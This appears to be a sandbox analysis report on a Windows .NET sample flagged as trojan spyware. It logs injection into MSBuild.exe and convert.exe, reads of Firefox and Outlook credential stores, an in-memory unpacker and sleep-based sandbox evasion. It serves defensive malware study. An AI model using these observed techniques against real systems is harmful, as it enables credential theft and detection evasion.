Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@7/5

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9B1ZyhsFUq.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\convert.exe

File created: C:\Users\user\AppData\Local\Temp\-16743

Jump to behavior

Source: 9B1ZyhsFUq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9B1ZyhsFUq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: convert.exe, 0000000B.00000002.2508578824.0000000003369000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2508578824.0000000003363000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2508578824.0000000003359000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9B1ZyhsFUq.exe	Virustotal: Detection: 40%
Source: 9B1ZyhsFUq.exe	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\9B1ZyhsFUq.exe "C:\Users\user\Desktop\9B1ZyhsFUq.exe"
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: scecli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: osuninst.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\convert.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 9B1ZyhsFUq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9B1ZyhsFUq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 9B1ZyhsFUq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: convert.pdb source: MSBuild.exe, 00000008.00000002.1718928304.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510127771.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000003.1658038940.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Outputs\Sepaiw.pdb source: 9B1ZyhsFUq.exe
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642483698.0000000000A4E000.00000002.00000001.01000000.00000007.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785866457.0000000000A4E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.1719109006.0000000003394000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.1721287038.0000000003546000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 0000000B.00000003.1719109006.0000000003394000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.1721287038.0000000003546000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: convert.pdbGCTL source: MSBuild.exe, 00000008.00000002.1718928304.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510127771.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000003.1658038940.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 9B1ZyhsFUq.exe, Notification.cs

.Net Code: RegistMessageID System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Code function: 0_2_00007FF7C1934D18 pushad ; iretd	0_2_00007FF7C1934D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004144AD push eax; ret	8_2_004144C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00407823 push D4BE487Bh; retf	8_2_00407829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004142D1 push ecx; ret	8_2_004142D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040D290 push edx; ret	8_2_0040D2CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004073A5 push esi; retf	8_2_004073A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042C4A3 push edi; ret	8_2_0042C4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00403570 push eax; ret	8_2_00403572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00418708 push ecx; retn 7131h	8_2_00418703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004077D2 push eax; ret	8_2_004077D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00417792 pushad ; retf	8_2_004177AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010809AD push ecx; mov dword ptr [esp], ecx	8_2_010809B6
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D47BD7 push edx; ret	10_2_02D47C12
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D520D9 pushad ; retf	10_2_02D520F2
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4216A push D4BE487Bh; retf	10_2_02D42170
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D42119 push eax; ret	10_2_02D4211F
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D41CEC push esi; retf	10_2_02D41CED
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4EC18 push ecx; ret	10_2_02D4EC1B
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4EDF4 push eax; ret	10_2_02D4EE0C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037209AD push ecx; mov dword ptr [esp], ecx	11_2_037209B6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0301421F pushad ; retf	11_2_03014238
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300425F push eax; ret	11_2_03004265
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030042B0 push D4BE487Bh; retf	11_2_030042B6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0301B66D push ecx; iretd	11_2_0301B66E
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03017AB0 push esi; retf	11_2_03017ABA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0301F8F5 push esp; ret	11_2_0301F8F9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03028F30 push edi; ret	11_2_03028F39
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03010F3A push eax; ret	11_2_03010F52
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03003E32 push esi; retf	11_2_03003E33
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03010D5E push ecx; ret	11_2_03010D61
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035C501C push ebp; ret	11_2_035C501E

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory allocated: 2E40000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory allocated: 1B090000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_010FD1C0 rdtsc

8_2_010FD1C0

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Window / User API: threadDelayed 593	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Window / User API: threadDelayed 400	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Window / User API: threadDelayed 3208	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Window / User API: threadDelayed 6765	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\convert.exe	API coverage: 2.9 %

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe TID: 7740	Thread sleep count: 593 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe TID: 7740	Thread sleep count: 400 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe TID: 7696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep count: 3208 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep time: -6416000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep count: 6765 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep time: -13530000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe TID: 1240	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\convert.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\convert.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\convert.exe

Code function: 11_2_0301BB30 FindFirstFileW,FindNextFileW,FindClose,

11_2_0301BB30

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: -16743.11.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: -16743.11.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: -16743.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: -16743.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: -16743.11.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
